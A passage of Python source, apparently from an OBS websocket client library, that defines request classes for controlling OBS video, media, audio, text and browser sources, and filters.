self.dataout['realm'] = realm
self.dataout['data'] = data
class GetVideoInfo(Baserequests):
"""Get basic OBS video information
:Returns:
*baseWidth*
type: int
Base (canvas) width
*baseHeight*
type: int
Base (canvas) height
*outputWidth*
type: int
Output width
*outputHeight*
type: int
Output height
*scaleType*
type: String
Scaling method used if output size differs from base size
*fps*
type: double
Frames rendered per second
*videoFormat*
type: String
Video color format
*colorSpace*
type: String
Color space for YUV
*colorRange*
type: String
Color range (full or partial)
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetVideoInfo'
self.datain['baseWidth'] = None
self.datain['baseHeight'] = None
self.datain['outputWidth'] = None
self.datain['outputHeight'] = None
self.datain['scaleType'] = None
self.datain['fps'] = None
self.datain['videoFormat'] = None
self.datain['colorSpace'] = None
self.datain['colorRange'] = None
def getBaseWidth(self):
return self.datain['baseWidth']
def getBaseHeight(self):
return self.datain['baseHeight']
def getOutputWidth(self):
return self.datain['outputWidth']
def getOutputHeight(self):
return self.datain['outputHeight']
def getScaleType(self):
return self.datain['scaleType']
def getFps(self):
return self.datain['fps']
def getVideoFormat(self):
return self.datain['videoFormat']
def getColorSpace(self):
return self.datain['colorSpace']
def getColorRange(self):
return self.datain['colorRange']
class OpenProjector(Baserequests):
"""Open a projector window or create a projector on a monitor. Requires OBS v24.0.4 or newer.
:Arguments:
*type*
type: String (Optional)
Type of projector: `Preview` (default), `Source`, `Scene`, `StudioProgram`, or `Multiview` (case insensitive).
*monitor*
type: int (Optional)
Monitor to open the projector on. If -1 or omitted, opens a window.
*geometry*
type: String (Optional)
Size and position of the projector window (only if monitor is -1). Encoded in Base64 using [Qt's geometry encoding](https://doc.qt.io/qt-5/qwidget.html#saveGeometry). Corresponds to OBS's saved projectors.
*name*
type: String (Optional)
Name of the source or scene to be displayed (ignored for other projector types).
"""
def __init__(self, type, monitor, geometry, name):
Baserequests.__init__(self)
self.name = 'OpenProjector'
self.dataout['type'] = type
self.dataout['monitor'] = monitor
self.dataout['geometry'] = geometry
self.dataout['name'] = name
class TriggerHotkeyByName(Baserequests):
"""Executes hotkey routine, identified by hotkey unique name
:Arguments:
*hotkeyName*
type: String
Unique name of the hotkey, as defined when registering the hotkey (e.g. "ReplayBuffer.Save")
"""
def __init__(self, hotkeyName):
Baserequests.__init__(self)
self.name = 'TriggerHotkeyByName'
self.dataout['hotkeyName'] = hotkeyName
class TriggerHotkeyBySequence(Baserequests):
"""Executes hotkey routine, identified by bound combination of keys. A single key combination might trigger multiple hotkey routines depending on user settings
:Arguments:
*keyId*
type: String
Main key identifier (e.g. `OBS_KEY_A` for key "A"). Available identifiers [here](https://github.com/obsproject/obs-studio/blob/master/libobs/obs-hotkeys.h)
*keyModifiers*
type: Object (Optional)
Optional key modifiers object. False entries can be ommitted
*keyModifiers.shift*
type: boolean
Trigger Shift Key
*keyModifiers.alt*
type: boolean
Trigger Alt Key
*keyModifiers.control*
type: boolean
Trigger Control (Ctrl) Key
*keyModifiers.command*
type: boolean
Trigger Command Key (Mac)
"""
def __init__(self, keyId, keyModifiers):
Baserequests.__init__(self)
self.name = 'TriggerHotkeyBySequence'
self.dataout['keyId'] = keyId
self.dataout['keyModifiers'] = keyModifiers
class PlayPauseMedia(Baserequests):
"""Pause or play a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
*playPause*
type: boolean
Whether to pause or play the source. `false` for play, `true` for pause.
"""
def __init__(self, sourceName, playPause):
Baserequests.__init__(self)
self.name = 'PlayPauseMedia'
self.dataout['sourceName'] = sourceName
self.dataout['playPause'] = playPause
class RestartMedia(Baserequests):
"""Restart a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'RestartMedia'
self.dataout['sourceName'] = sourceName
class StopMedia(Baserequests):
"""Stop a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'StopMedia'
self.dataout['sourceName'] = sourceName
class NextMedia(Baserequests):
"""Skip to the next media item in the playlist. Supports only vlc media source (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'NextMedia'
self.dataout['sourceName'] = sourceName
class PreviousMedia(Baserequests):
"""Go to the previous media item in the playlist. Supports only vlc media source (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'PreviousMedia'
self.dataout['sourceName'] = sourceName
class GetMediaDuration(Baserequests):
"""Get the length of media in milliseconds. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
Note: For some reason, for the first 5 or so seconds that the media is playing, the total duration can be off by upwards of 50ms.
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*mediaDuration*
type: int
The total length of media in milliseconds..
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetMediaDuration'
self.datain['mediaDuration'] = None
self.dataout['sourceName'] = sourceName
def getMediaDuration(self):
return self.datain['mediaDuration']
class GetMediaTime(Baserequests):
"""Get the current timestamp of media in milliseconds. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*timestamp*
type: int
The time in milliseconds since the start of the media.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetMediaTime'
self.datain['timestamp'] = None
self.dataout['sourceName'] = sourceName
def getTimestamp(self):
return self.datain['timestamp']
class SetMediaTime(Baserequests):
"""Set the timestamp of a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
*timestamp*
type: int
Milliseconds to set the timestamp to.
"""
def __init__(self, sourceName, timestamp):
Baserequests.__init__(self)
self.name = 'SetMediaTime'
self.dataout['sourceName'] = sourceName
self.dataout['timestamp'] = timestamp
class ScrubMedia(Baserequests):
"""Scrub media using a supplied offset. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
Note: Due to processing/network delays, this request is not perfect. The processing rate of this request has also not been tested.
:Arguments:
*sourceName*
type: String
Source name.
*timeOffset*
type: int
Millisecond offset (positive or negative) to offset the current media position.
"""
def __init__(self, sourceName, timeOffset):
Baserequests.__init__(self)
self.name = 'ScrubMedia'
self.dataout['sourceName'] = sourceName
self.dataout['timeOffset'] = timeOffset
class GetMediaState(Baserequests):
"""Get the current playing state of a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*mediaState*
type: String
The media state of the provided source. States: `none`, `playing`, `opening`, `buffering`, `paused`, `stopped`, `ended`, `error`, `unknown`
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetMediaState'
self.datain['mediaState'] = None
self.dataout['sourceName'] = sourceName
def getMediaState(self):
return self.datain['mediaState']
class GetMediaSourcesList(Baserequests):
"""List the media state of all media sources (vlc and media source)
:Returns:
*mediaSources*
type: Array<Object>
Array of sources
*mediaSources.*.sourceName*
type: String
Unique source name
*mediaSources.*.sourceKind*
type: String
Unique source internal type (a.k.a `ffmpeg_source` or `vlc_source`)
*mediaSources.*.mediaState*
type: String
The current state of media for that source. States: `none`, `playing`, `opening`, `buffering`, `paused`, `stopped`, `ended`, `error`, `unknown`
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetMediaSourcesList'
self.datain['mediaSources'] = None
def getMediaSources(self):
return self.datain['mediaSources']
class CreateSource(Baserequests):
"""Create a source and add it as a sceneitem to a scene.
:Arguments:
*sourceName*
type: String
Source name.
*sourceKind*
type: String
Source kind, Eg. `vlc_source`.
*sceneName*
type: String
Scene to add the new source to.
*sourceSettings*
type: Object (optional)
Source settings data.
*setVisible*
type: boolean (optional)
Set the created SceneItem as visible or not. Defaults to true
:Returns:
*itemId*
type: int
ID of the SceneItem in the scene.
"""
def __init__(self, sourceName, sourceKind, sceneName, sourceSettings=None, setVisible=None):
Baserequests.__init__(self)
self.name = 'CreateSource'
self.datain['itemId'] = None
self.dataout['sourceName'] = sourceName
self.dataout['sourceKind'] = sourceKind
self.dataout['sceneName'] = sceneName
self.dataout['sourceSettings'] = sourceSettings
self.dataout['setVisible'] = setVisible
def getItemId(self):
return self.datain['itemId']
class GetSourcesList(Baserequests):
"""List all sources available in the running OBS instance
:Returns:
*sources*
type: Array<Object>
Array of sources
*sources.*.name*
type: String
Unique source name
*sources.*.typeId*
type: String
Non-unique source internal type (a.k.a kind)
*sources.*.type*
type: String
Source type. Value is one of the following: "input", "filter", "transition", "scene" or "unknown"
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetSourcesList'
self.datain['sources'] = None
def getSources(self):
return self.datain['sources']
class GetSourceTypesList(Baserequests):
"""Get a list of all available sources types
:Returns:
*types*
type: Array<Object>
Array of source types
*types.*.typeId*
type: String
Non-unique internal source type ID
*types.*.displayName*
type: String
Display name of the source type
*types.*.type*
type: String
Type. Value is one of the following: "input", "filter", "transition" or "other"
*types.*.defaultSettings*
type: Object
Default settings of this source type
*types.*.caps*
type: Object
Source type capabilities
*types.*.caps.isAsync*
type: Boolean
True if source of this type provide frames asynchronously
*types.*.caps.hasVideo*
type: Boolean
True if sources of this type provide video
*types.*.caps.hasAudio*
type: Boolean
True if sources of this type provide audio
*types.*.caps.canInteract*
type: Boolean
True if interaction with this sources of this type is possible
*types.*.caps.isComposite*
type: Boolean
True if sources of this type composite one or more sub-sources
*types.*.caps.doNotDuplicate*
type: Boolean
True if sources of this type should not be fully duplicated
*types.*.caps.doNotSelfMonitor*
type: Boolean
True if sources of this type may cause a feedback loop if it's audio is monitored and shouldn't be
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetSourceTypesList'
self.datain['types'] = None
def getTypes(self):
return self.datain['types']
class GetVolume(Baserequests):
"""Get the volume of the specified source. Default response uses mul format, NOT SLIDER PERCENTAGE.
:Arguments:
*source*
type: String
Source name.
*useDecibel*
type: boolean (optional)
Output volume in decibels of attenuation instead of amplitude/mul.
:Returns:
*name*
type: String
Source name.
*volume*
type: double
Volume of the source. Between `0.0` and `20.0` if using mul, under `26.0` if using dB.
*muted*
type: boolean
Indicates whether the source is muted.
"""
def __init__(self, source, useDecibel=None):
Baserequests.__init__(self)
self.name = 'GetVolume'
self.datain['name'] = None
self.datain['volume'] = None
self.datain['muted'] = None
self.dataout['source'] = source
self.dataout['useDecibel'] = useDecibel
def getName(self):
return self.datain['name']
def getVolume(self):
return self.datain['volume']
def getMuted(self):
return self.datain['muted']
class SetVolume(Baserequests):
"""Set the volume of the specified source. Default request format uses mul, NOT SLIDER PERCENTAGE.
:Arguments:
*source*
type: String
Source name.
*volume*
type: double
Desired volume. Must be between `0.0` and `20.0` for mul, and under 26.0 for dB. OBS will interpret dB values under -100.0 as Inf. Note: The OBS volume sliders only reach a maximum of 1.0mul/0.0dB, however OBS actually supports larger values.
*useDecibel*
type: boolean (optional)
Interperet `volume` data as decibels instead of amplitude/mul.
"""
def __init__(self, source, volume, useDecibel=None):
Baserequests.__init__(self)
self.name = 'SetVolume'
self.dataout['source'] = source
self.dataout['volume'] = volume
self.dataout['useDecibel'] = useDecibel
class GetMute(Baserequests):
"""Get the mute status of a specified source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*name*
type: String
Source name.
*muted*
type: boolean
Mute status of the source.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetMute'
self.datain['name'] = None
self.datain['muted'] = None
self.dataout['source'] = source
def getName(self):
return self.datain['name']
def getMuted(self):
return self.datain['muted']
class SetMute(Baserequests):
"""Sets the mute status of a specified source.
:Arguments:
*source*
type: String
Source name.
*mute*
type: boolean
Desired mute status.
"""
def __init__(self, source, mute):
Baserequests.__init__(self)
self.name = 'SetMute'
self.dataout['source'] = source
self.dataout['mute'] = mute
class ToggleMute(Baserequests):
"""Inverts the mute status of a specified source.
:Arguments:
*source*
type: String
Source name.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'ToggleMute'
self.dataout['source'] = source
class GetAudioActive(Baserequests):
"""Get the audio's active status of a specified source.
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*audioActive*
type: boolean
Audio active status of the source.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetAudioActive'
self.datain['audioActive'] = None
self.dataout['sourceName'] = sourceName
def getAudioActive(self):
return self.datain['audioActive']
class SetSourceName(Baserequests):
"""
Note: If the new name already exists as a source, obs-websocket will return an error.
:Arguments:
*sourceName*
type: String
Source name.
*newName*
type: String
New source name.
"""
def __init__(self, sourceName, newName):
Baserequests.__init__(self)
self.name = 'SetSourceName'
self.dataout['sourceName'] = sourceName
self.dataout['newName'] = newName
class SetSyncOffset(Baserequests):
"""Set the audio sync offset of a specified source.
:Arguments:
*source*
type: String
Source name.
*offset*
type: int
The desired audio sync offset (in nanoseconds).
"""
def __init__(self, source, offset):
Baserequests.__init__(self)
self.name = 'SetSyncOffset'
self.dataout['source'] = source
self.dataout['offset'] = offset
class GetSyncOffset(Baserequests):
"""Get the audio sync offset of a specified source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*name*
type: String
Source name.
*offset*
type: int
The audio sync offset (in nanoseconds).
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetSyncOffset'
self.datain['name'] = None
self.datain['offset'] = None
self.dataout['source'] = source
def getName(self):
return self.datain['name']
def getOffset(self):
return self.datain['offset']
class GetSourceSettings(Baserequests):
"""Get settings of the specified source
:Arguments:
*sourceName*
type: String
Source name.
*sourceType*
type: String (optional)
Type of the specified source. Useful for type-checking if you expect a specific settings schema.
:Returns:
*sourceName*
type: String
Source name
*sourceType*
type: String
Type of the specified source
*sourceSettings*
type: Object
Source settings (varies between source types, may require some probing around).
"""
def __init__(self, sourceName, sourceType=None):
Baserequests.__init__(self)
self.name = 'GetSourceSettings'
self.datain['sourceName'] = None
self.datain['sourceType'] = None
self.datain['sourceSettings'] = None
self.dataout['sourceName'] = sourceName
self.dataout['sourceType'] = sourceType
def getSourceName(self):
return self.datain['sourceName']
def getSourceType(self):
return self.datain['sourceType']
def getSourceSettings(self):
return self.datain['sourceSettings']
class SetSourceSettings(Baserequests):
"""Set settings of the specified source.
:Arguments:
*sourceName*
type: String
Source name.
*sourceType*
type: String (optional)
Type of the specified source. Useful for type-checking to avoid settings a set of settings incompatible with the actual source's type.
*sourceSettings*
type: Object
Source settings (varies between source types, may require some probing around).
:Returns:
*sourceName*
type: String
Source name
*sourceType*
type: String
Type of the specified source
*sourceSettings*
type: Object
Updated source settings
"""
def __init__(self, sourceName, sourceSettings, sourceType=None):
Baserequests.__init__(self)
self.name = 'SetSourceSettings'
self.datain['sourceName'] = None
self.datain['sourceType'] = None
self.datain['sourceSettings'] = None
self.dataout['sourceName'] = sourceName
self.dataout['sourceSettings'] = sourceSettings
self.dataout['sourceType'] = sourceType
def getSourceName(self):
return self.datain['sourceName']
def getSourceType(self):
return self.datain['sourceType']
def getSourceSettings(self):
return self.datain['sourceSettings']
class GetTextGDIPlusProperties(Baserequests):
"""Get the current properties of a Text GDI Plus source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*source*
type: String
Source name.
*align*
type: String
Text Alignment ("left", "center", "right").
*bk_color*
type: int
Background color.
*bk_opacity*
type: int
Background opacity (0-100).
*chatlog*
type: boolean
Chat log.
*chatlog_lines*
type: int
Chat log lines.
*color*
type: int
Text color.
*extents*
type: boolean
Extents wrap.
*extents_cx*
type: int
Extents cx.
*extents_cy*
type: int
Extents cy.
*file*
type: String
File path name.
*read_from_file*
type: boolean
Read text from the specified file.
*font*
type: Object
Holds data for the font. Ex: `"font": { "face": "Arial", "flags": 0, "size": 150, "style": "" }`
*font.face*
type: String
Font face.
*font.flags*
type: int
Font text styling flag. `Bold=1, Italic=2, Bold Italic=3, Underline=5, Strikeout=8`
*font.size*
type: int
Font text size.
*font.style*
type: String
Font Style (unknown function).
*gradient*
type: boolean
Gradient enabled.
*gradient_color*
type: int
Gradient color.
*gradient_dir*
type: float
Gradient direction.
*gradient_opacity*
type: int
Gradient opacity (0-100).
*outline*
type: boolean
Outline.
*outline_color*
type: int
Outline color.
*outline_size*
type: int
Outline size.
*outline_opacity*
type: int
Outline opacity (0-100).
*text*
type: String
Text content to be displayed.
*valign*
type: String
Text vertical alignment ("top", "center", "bottom").
*vertical*
type: boolean
Vertical text enabled.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetTextGDIPlusProperties'
self.datain['source'] = None
self.datain['align'] = None
self.datain['bk_color'] = None
self.datain['bk_opacity'] = None
self.datain['chatlog'] = None
self.datain['chatlog_lines'] = None
self.datain['color'] = None
self.datain['extents'] = None
self.datain['extents_cx'] = None
self.datain['extents_cy'] = None
self.datain['file'] = None
self.datain['read_from_file'] = None
self.datain['font'] = None
self.datain['gradient'] = None
self.datain['gradient_color'] = None
self.datain['gradient_dir'] = None
self.datain['gradient_opacity'] = None
self.datain['outline'] = None
self.datain['outline_color'] = None
self.datain['outline_size'] = None
self.datain['outline_opacity'] = None
self.datain['text'] = None
self.datain['valign'] = None
self.datain['vertical'] = None
self.dataout['source'] = source
def getSource(self):
return self.datain['source']
def getAlign(self):
return self.datain['align']
def getBk_color(self):
return self.datain['bk_color']
def getBk_opacity(self):
return self.datain['bk_opacity']
def getChatlog(self):
return self.datain['chatlog']
def getChatlog_lines(self):
return self.datain['chatlog_lines']
def getColor(self):
return self.datain['color']
def getExtents(self):
return self.datain['extents']
def getExtents_cx(self):
return self.datain['extents_cx']
def getExtents_cy(self):
return self.datain['extents_cy']
def getFile(self):
return self.datain['file']
def getRead_from_file(self):
return self.datain['read_from_file']
def getFont(self):
return self.datain['font']
def getGradient(self):
return self.datain['gradient']
def getGradient_color(self):
return self.datain['gradient_color']
def getGradient_dir(self):
return self.datain['gradient_dir']
def getGradient_opacity(self):
return self.datain['gradient_opacity']
def getOutline(self):
return self.datain['outline']
def getOutline_color(self):
return self.datain['outline_color']
def getOutline_size(self):
return self.datain['outline_size']
def getOutline_opacity(self):
return self.datain['outline_opacity']
def getText(self):
return self.datain['text']
def getValign(self):
return self.datain['valign']
def getVertical(self):
return self.datain['vertical']
class SetTextGDIPlusProperties(Baserequests):
"""Set the current properties of a Text GDI Plus source.
:Arguments:
*source*
type: String
Name of the source.
*align*
type: String (optional)
Text Alignment ("left", "center", "right").
*bk_color*
type: int (optional)
Background color.
*bk_opacity*
type: int (optional)
Background opacity (0-100).
*chatlog*
type: boolean (optional)
Chat log.
*chatlog_lines*
type: int (optional)
Chat log lines.
*color*
type: int (optional)
Text color.
*extents*
type: boolean (optional)
Extents wrap.
*extents_cx*
type: int (optional)
Extents cx.
*extents_cy*
type: int (optional)
Extents cy.
*file*
type: String (optional)
File path name.
*read_from_file*
type: boolean (optional)
Read text from the specified file.
*font*
type: Object (optional)
Holds data for the font. Ex: `"font": { "face": "Arial", "flags": 0, "size": 150, "style": "" }`
*font.face*
type: String (optional)
Font face.
*font.flags*
type: int (optional)
Font text styling flag. `Bold=1, Italic=2, Bold Italic=3, Underline=5, Strikeout=8`
*font.size*
type: int (optional)
Font text size.
*font.style*
type: String (optional)
Font Style (unknown function).
*gradient*
type: boolean (optional)
Gradient enabled.
*gradient_color*
type: int (optional)
Gradient color.
*gradient_dir*
type: float (optional)
Gradient direction.
*gradient_opacity*
type: int (optional)
Gradient opacity (0-100).
*outline*
type: boolean (optional)
Outline.
*outline_color*
type: int (optional)
Outline color.
*outline_size*
type: int (optional)
Outline size.
*outline_opacity*
type: int (optional)
Outline opacity (0-100).
*text*
type: String (optional)
Text content to be displayed.
*valign*
type: String (optional)
Text vertical alignment ("top", "center", "bottom").
*vertical*
type: boolean (optional)
Vertical text enabled.
*render*
type: boolean (optional)
Visibility of the scene item.
"""
def __init__(self, source, align=None, bk_color=None, bk_opacity=None, chatlog=None, chatlog_lines=None, color=None, extents=None, extents_cx=None, extents_cy=None, file=None, read_from_file=None, font=None, gradient=None, gradient_color=None, gradient_dir=None, gradient_opacity=None, outline=None, outline_color=None, outline_size=None, outline_opacity=None, text=None, valign=None, vertical=None, render=None):
Baserequests.__init__(self)
self.name = 'SetTextGDIPlusProperties'
self.dataout['source'] = source
self.dataout['align'] = align
self.dataout['bk_color'] = bk_color
self.dataout['bk_opacity'] = bk_opacity
self.dataout['chatlog'] = chatlog
self.dataout['chatlog_lines'] = chatlog_lines
self.dataout['color'] = color
self.dataout['extents'] = extents
self.dataout['extents_cx'] = extents_cx
self.dataout['extents_cy'] = extents_cy
self.dataout['file'] = file
self.dataout['read_from_file'] = read_from_file
self.dataout['font'] = font
self.dataout['gradient'] = gradient
self.dataout['gradient_color'] = gradient_color
self.dataout['gradient_dir'] = gradient_dir
self.dataout['gradient_opacity'] = gradient_opacity
self.dataout['outline'] = outline
self.dataout['outline_color'] = outline_color
self.dataout['outline_size'] = outline_size
self.dataout['outline_opacity'] = outline_opacity
self.dataout['text'] = text
self.dataout['valign'] = valign
self.dataout['vertical'] = vertical
self.dataout['render'] = render
class GetTextFreetype2Properties(Baserequests):
"""Get the current properties of a Text Freetype 2 source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*source*
type: String
Source name
*color1*
type: int
Gradient top color.
*color2*
type: int
Gradient bottom color.
*custom_width*
type: int
Custom width (0 to disable).
*drop_shadow*
type: boolean
Drop shadow.
*font*
type: Object
Holds data for the font. Ex: `"font": { "face": "Arial", "flags": 0, "size": 150, "style": "" }`
*font.face*
type: String
Font face.
*font.flags*
type: int
Font text styling flag. `Bold=1, Italic=2, Bold Italic=3, Underline=5, Strikeout=8`
*font.size*
type: int
Font text size.
*font.style*
type: String
Font Style (unknown function).
*from_file*
type: boolean
Read text from the specified file.
*log_mode*
type: boolean
Chat log.
*outline*
type: boolean
Outline.
*text*
type: String
Text content to be displayed.
*text_file*
type: String
File path.
*word_wrap*
type: boolean
Word wrap.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetTextFreetype2Properties'
self.datain['source'] = None
self.datain['color1'] = None
self.datain['color2'] = None
self.datain['custom_width'] = None
self.datain['drop_shadow'] = None
self.datain['font'] = None
self.datain['from_file'] = None
self.datain['log_mode'] = None
self.datain['outline'] = None
self.datain['text'] = None
self.datain['text_file'] = None
self.datain['word_wrap'] = None
self.dataout['source'] = source
def getSource(self):
return self.datain['source']
def getColor1(self):
return self.datain['color1']
def getColor2(self):
return self.datain['color2']
def getCustom_width(self):
return self.datain['custom_width']
def getDrop_shadow(self):
return self.datain['drop_shadow']
def getFont(self):
return self.datain['font']
def getFrom_file(self):
return self.datain['from_file']
def getLog_mode(self):
return self.datain['log_mode']
def getOutline(self):
return self.datain['outline']
def getText(self):
return self.datain['text']
def getText_file(self):
return self.datain['text_file']
def getWord_wrap(self):
return self.datain['word_wrap']
class SetTextFreetype2Properties(Baserequests):
"""Set the current properties of a Text Freetype 2 source.
:Arguments:
*source*
type: String
Source name.
*color1*
type: int (optional)
Gradient top color.
*color2*
type: int (optional)
Gradient bottom color.
*custom_width*
type: int (optional)
Custom width (0 to disable).
*drop_shadow*
type: boolean (optional)
Drop shadow.
*font*
type: Object (optional)
Holds data for the font. Ex: `"font": { "face": "Arial", "flags": 0, "size": 150, "style": "" }`
*font.face*
type: String (optional)
Font face.
*font.flags*
type: int (optional)
Font text styling flag. `Bold=1, Italic=2, Bold Italic=3, Underline=5, Strikeout=8`
*font.size*
type: int (optional)
Font text size.
*font.style*
type: String (optional)
Font Style (unknown function).
*from_file*
type: boolean (optional)
Read text from the specified file.
*log_mode*
type: boolean (optional)
Chat log.
*outline*
type: boolean (optional)
Outline.
*text*
type: String (optional)
Text content to be displayed.
*text_file*
type: String (optional)
File path.
*word_wrap*
type: boolean (optional)
Word wrap.
"""
def __init__(self, source, color1=None, color2=None, custom_width=None, drop_shadow=None, font=None, from_file=None, log_mode=None, outline=None, text=None, text_file=None, word_wrap=None):
Baserequests.__init__(self)
self.name = 'SetTextFreetype2Properties'
self.dataout['source'] = source
self.dataout['color1'] = color1
self.dataout['color2'] = color2
self.dataout['custom_width'] = custom_width
self.dataout['drop_shadow'] = drop_shadow
self.dataout['font'] = font
self.dataout['from_file'] = from_file
self.dataout['log_mode'] = log_mode
self.dataout['outline'] = outline
self.dataout['text'] = text
self.dataout['text_file'] = text_file
self.dataout['word_wrap'] = word_wrap
class GetBrowserSourceProperties(Baserequests):
"""Get current properties for a Browser Source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*source*
type: String
Source name.
*is_local_file*
type: boolean
Indicates that a local file is in use.
*local_file*
type: String
file path.
*url*
type: String
Url.
*css*
type: String
CSS to inject.
*width*
type: int
Width.
*height*
type: int
Height.
*fps*
type: int
Framerate.
*shutdown*
type: boolean
Indicates whether the source should be shutdown when not visible.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetBrowserSourceProperties'
self.datain['source'] = None
self.datain['is_local_file'] = None
self.datain['local_file'] = None
self.datain['url'] = None
self.datain['css'] = None
self.datain['width'] = None
self.datain['height'] = None
self.datain['fps'] = None
self.datain['shutdown'] = None
self.dataout['source'] = source
def getSource(self):
return self.datain['source']
def getIs_local_file(self):
return self.datain['is_local_file']
def getLocal_file(self):
return self.datain['local_file']
def getUrl(self):
return self.datain['url']
def getCss(self):
return self.datain['css']
def getWidth(self):
return self.datain['width']
def getHeight(self):
return self.datain['height']
def getFps(self):
return self.datain['fps']
def getShutdown(self):
return self.datain['shutdown']
class SetBrowserSourceProperties(Baserequests):
"""Set current properties for a Browser Source.
:Arguments:
*source*
type: String
Name of the source.
*is_local_file*
type: boolean (optional)
Indicates that a local file is in use.
*local_file*
type: String (optional)
file path.
*url*
type: String (optional)
Url.
*css*
type: String (optional)
CSS to inject.
*width*
type: int (optional)
Width.
*height*
type: int (optional)
Height.
*fps*
type: int (optional)
Framerate.
*shutdown*
type: boolean (optional)
Indicates whether the source should be shutdown when not visible.
*render*
type: boolean (optional)
Visibility of the scene item.
"""
def __init__(self, source, is_local_file=None, local_file=None, url=None, css=None, width=None, height=None, fps=None, shutdown=None, render=None):
Baserequests.__init__(self)
self.name = 'SetBrowserSourceProperties'
self.dataout['source'] = source
self.dataout['is_local_file'] = is_local_file
self.dataout['local_file'] = local_file
self.dataout['url'] = url
self.dataout['css'] = css
self.dataout['width'] = width
self.dataout['height'] = height
self.dataout['fps'] = fps
self.dataout['shutdown'] = shutdown
self.dataout['render'] = render
class GetSpecialSources(Baserequests):
"""Get configured special sources like Desktop Audio and Mic/Aux sources.
:Returns:
*desktop_1*
type: String (optional)
Name of the first Desktop Audio capture source.
*desktop_2*
type: String (optional)
Name of the second Desktop Audio capture source.
*mic_1*
type: String (optional)
Name of the first Mic/Aux input source.
*mic_2*
type: String (optional)
Name of the second Mic/Aux input source.
*mic_3*
type: String (optional)
NAme of the third Mic/Aux input source.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetSpecialSources'
self.datain['desktop-1'] = None
self.datain['desktop-2'] = None
self.datain['mic-1'] = None
self.datain['mic-2'] = None
self.datain['mic-3'] = None
def getDesktop1(self):
return self.datain['desktop-1']
def getDesktop2(self):
return self.datain['desktop-2']
def getMic1(self):
return self.datain['mic-1']
def getMic2(self):
return self.datain['mic-2']
def getMic3(self):
return self.datain['mic-3']
class GetSourceFilters(Baserequests):
"""List filters applied to a source
:Arguments:
*sourceName*
type: String
Source name
:Returns:
*filters*
type: Array<Object>
List of filters for the specified source
*filters.*.enabled*
type: Boolean
Filter status (enabled or not)
*filters.*.type*
type: String
Filter type
*filters.*.name*
type: String
Filter name
*filters.*.settings*
type: Object
Filter settings
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetSourceFilters'
self.datain['filters'] = None
self.dataout['sourceName'] = sourceName
def getFilters(self):
return self.datain['filters']
class GetSourceFilterInfo(Baserequests):
"""List filters applied to a source
:Arguments:
*sourceName*
type: String
Source name
*filterName*
type: String
Source filter name
:Returns:
*enabled*
type: Boolean
Filter status (enabled or not)
*type*
type: String
Filter type
*name*
type: String
Filter name
*settings*
type: Object
Filter settings
"""
def __init__(self, sourceName, filterName):
Baserequests.__init__(self)
self.name = 'GetSourceFilterInfo'
self.datain['enabled'] = None
self.datain['type'] = None
self.datain['name'] = None
self.datain['settings'] = None
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
def getEnabled(self):
return self.datain['enabled']
def getType(self):
return self.datain['type']
def getName(self):
return self.datain['name']
def getSettings(self):
return self.datain['settings']
class AddFilterToSource(Baserequests):
"""Add a new filter to a source. Available source types along with their settings properties are available from `GetSourceTypesList`.
:Arguments:
*sourceName*
type: String
Name of the source on which the filter is added
*filterName*
type: String
Name of the new filter
*filterType*
type: String
Filter type
*filterSettings*
type: Object
Filter settings
"""
def __init__(self, sourceName, filterName, filterType, filterSettings):
Baserequests.__init__(self)
self.name = 'AddFilterToSource'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
self.dataout['filterType'] = filterType
self.dataout['filterSettings'] = filterSettings
class RemoveFilterFromSource(Baserequests):
"""Remove a filter from a source
:Arguments:
*sourceName*
type: String
Name of the source from which the specified filter is removed
*filterName*
type: String
Name of the filter to remove
"""
def __init__(self, sourceName, filterName):
Baserequests.__init__(self)
self.name = 'RemoveFilterFromSource'
self.dataout['sourceName'] = sourceName
self.dataout['filterName'] = filterName
class ReorderSourceFilter(Baserequests):
"""Move a filter in the chain (absolute index positioning)
:Arguments:
*sourceName*
type: String
Name of the source to which the filter belongs
*filterName*
type: String
